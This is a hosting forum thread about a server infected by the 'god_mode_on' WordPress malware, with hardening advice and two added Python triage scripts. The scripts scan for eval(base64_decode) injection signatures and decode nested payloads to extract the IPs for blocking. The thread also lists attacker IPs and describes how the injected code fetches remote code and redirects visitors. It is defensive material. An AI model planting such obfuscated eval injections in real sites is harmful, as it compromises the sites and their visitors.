Has my server been hacked?

ChildOTK

Member
Aug 2, 2011
18
0
51
Good Day,

We noticed this morning some really suspicious code in our files:

When trying to decode the string, it appears to be exactly the same code and looks like an endless loop.

Several files have this code added and the last modified date and time was this morning at 8:05am.

I checked /var/log/messages for activity around that time and the only thing I could find was this:

Code:
Mar 15 08:05:47 w1 kernel: php[12447]: segfault at 00007fff806f6ae8 rip 00002b08051a1c38 rsp 00007fff806f6ad0 error 6
Does anybody have any idea what this is or what I can do about it?

I have iptables set up as best I can on the server, and the logs didn't show any suspicious activity either, so I don't understand.

Thank you!
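Added example, not code from the thread or from cPanel: a small Python triage scanner that walks a web root for the two signatures visible in the injected code (the /*god_mode_on*/ marker and the eval(base64_decode( wrapper) and filters hits by modification time, which is how you would enumerate every file touched by the 08:05 run rather than only the ones noticed by hand. The function names, the temp-directory fixture, the file paths and the "QUJD" stand-in payload are constructed for the demo.

```python
import os, re, tempfile, time
from datetime import datetime

# Constructed signatures based on what the poster found: the god_mode marker
# comment and the eval(base64_decode(...)) wrapper. Not a vendor ruleset.
SIGNATURES = {
    "god_mode_marker": re.compile(rb"/\*god_mode_on\*/"),
    "eval_b64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
}
SCAN_EXTS = (".php", ".inc", ".phtml", ".js", ".html")

def scan_webroot(root, window_start=None, window_end=None):
    # Walk root; return hits as dicts (path, signature, mtime ISO string).
    # With an epoch-seconds window, only files modified inside it are reported.
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTS):
                continue
            path = os.path.join(dirpath, name)
            try:
                mtime = os.stat(path).st_mtime
                with open(path, "rb") as fh:
                    head = fh.read(65536)  # injections are prepended, so the head suffices
            except OSError:
                continue
            if window_start is not None and not (window_start <= mtime <= window_end):
                continue
            for sig_name, rx in SIGNATURES.items():
                if rx.search(head):
                    stamp = datetime.fromtimestamp(mtime).isoformat(timespec="seconds")
                    hits.append({"path": path, "signature": sig_name, "mtime": stamp})
                    break
    return hits

def demo():
    # Constructed fixture: one clean file, one carrying a harmless stand-in injection.
    root = tempfile.mkdtemp(prefix="webroot_")
    infected = os.path.join(root, "wp-content", "themes", "header.php")
    os.makedirs(os.path.dirname(infected))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(infected, "w") as fh:  # "QUJD" is just base64 of "ABC"
        fh.write('<?php /*god_mode_on*/eval(base64_decode("QUJD")); /*god_mode_off*/ ?>\n')
    injected_at = time.mktime((2012, 3, 15, 8, 5, 47, 0, 0, -1))  # the log line's timestamp
    os.utime(infected, (injected_at, injected_at))
    os.utime(os.path.join(root, "index.php"), (injected_at - 86400,) * 2)
    # Window: half an hour either side of the segfault timestamp.
    return scan_webroot(root, injected_at - 1800, injected_at + 1800)
```

Run it against the real document root without a window first to get every infected file, then with the window to separate that morning's batch from older modifications.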
 

Infopro

Well-Known Member
May 20, 2003
17,075
524
613
Pennsylvania
cPanel Access Level
Root Administrator
Suspend that account or accounts and hire a professional to assist you with this. My guess is that you have indeed been compromised.

There are many good System Admin Companies listed here:
Sys Admin Services « cPanel Application Catalog

Assisting with cleaning up a compromised server is a bit out of the scope of these, or any forums, really.
 

th3joker

Member
Mar 12, 2012
12
0
51
cPanel Access Level
Root Administrator
I would look at adding some or all of the following to harden the server:

CSF (firewall): free and integrates with cPanel/WHM quite nicely
fail2ban
portsentry
chkrootkit
rkhunter
securetmp
clam (antivirus)

In your hosts.allow add in your IPs, then deny all services to everyone else except httpd.

hosts.allow on its own isn't sufficient; you should have multiple levels of security.

If you need some help we can point you in the right direction.
 

th3joker

Member
Mar 12, 2012
12
0
51
cPanel Access Level
Root Administrator
Our original hosting was shared and the host company was useless; we got hacked constantly, gave up, and bought our own dedicated server in the end.

Our logs are full of hack attempts, port scans, etc.
 

Infopro

Well-Known Member
May 20, 2003
17,075
524
613
Pennsylvania
cPanel Access Level
Root Administrator
If the cPanel account or website password has been compromised you'll find it very tough to stop this sort of thing from happening. Scans to find vulnerable scripts and poke them are very common.

Keeping all scripts, and mods to them, up to date and using very strong passwords may still not be enough if the user gets infected on his local computer and all his passwords are stolen. And then used.

There's a lot more to hosting than just putting up a server and adding a website. Lots more. If you're unsure of how to set up good security to help protect your work, hire someone. The cost of hiring a professional is much less than the grief you go through once you've been hacked and all your customers move out, like th3joker has done.
 

alphawolf50

Well-Known Member
Apr 28, 2011
186
2
68
cPanel Access Level
Root Administrator
The base64 encoded string isn't an endless loop, just a long one. While you're getting this situation handled, it would be a good idea to block these specific IP addresses referenced by the attack code:

146.185.254.245
31.184.242.103
91.196.216.148
91.196.216.49

The script downloads some (unknown) code from those IP addresses and injects it into your pages. If it can't do that, it injects some JavaScript into the pages instead. The JavaScript looks like it tries to direct the client to one of those IP addresses.

This seems to be a WordPress exploit. This thread at wordpress.org has lots of information regarding how to clean up the issue, and how you might have gotten infected:

WordPress › Support » I think my site has been hacked. Please Help ASAP?
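Added example, not code from the thread or from cPanel: a Python helper that statically peels nested eval(base64_decode("...")) layers without ever executing the PHP, with a hard layer cap so a blob that really did reference itself could not loop. It then pulls the IPv4 literals out of the innermost code, which is the list you would feed to a firewall deny rule or grep for in the access logs. The sample is built inline by wrap(); its inner PHP and the RFC 5737 documentation addresses are constructed, not the real payload.

```python
import base64
import re

# One eval(base64_decode("...")) layer; the injected code nests many of these.
LAYER_RX = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)\s*\)\s*;?', re.I)
IPV4_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def unwrap_layers(code, max_layers=200):
    """Statically peel nested wrappers; returns (layers_removed, innermost_code).

    Stops when no wrapper remains, when the base64 is invalid, or at max_layers,
    so the loop terminates even on a self-referencing blob.
    """
    layers = 0
    while layers < max_layers:
        m = LAYER_RX.search(code)
        if not m:
            break
        try:
            decoded = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        code = decoded.decode("utf-8", errors="replace")
        layers += 1
    return layers, code

def extract_ips(code):
    """Unique IPv4 literals in order of appearance, for blocklists or log greps."""
    seen = []
    for ip in IPV4_RX.findall(code):
        if ip not in seen:
            seen.append(ip)
    return seen

def wrap(code, layers):
    """Build a constructed nested sample in the same shape as the injected code."""
    for _ in range(layers):
        b64 = base64.b64encode(code.encode()).decode()
        code = '/*god_mode_on*/eval(base64_decode("%s")); /*god_mode_off*/' % b64
    return code

def demo():
    # Constructed innermost layer; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
    inner = ('<?php $h = array("192.0.2.10", "198.51.100.7", "192.0.2.10"); '
             'foreach ($h as $ip) { $src = "http://" . $ip . "/in.php"; } ?>')
    sample = wrap(inner, 7)
    depth, plain = unwrap_layers(sample)
    return depth, plain, extract_ips(plain)
```

To triage a real file, read it in and pass its contents to unwrap_layers() instead of the constructed sample; the layer count tells you how deep the nesting went and the returned code is what would have run.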
 

wpchamp

Registered
Mar 20, 2012
1
0
51
cPanel Access Level
Website Owner
Hello there,

It appears you have been hit with the "god mode on" WordPress virus. There's a good guide on how to get rid of it here:

/http://marketingsiden.dk/how-to-remove-god_mode_on-wordpress-virus/

Best Regards
wpchamp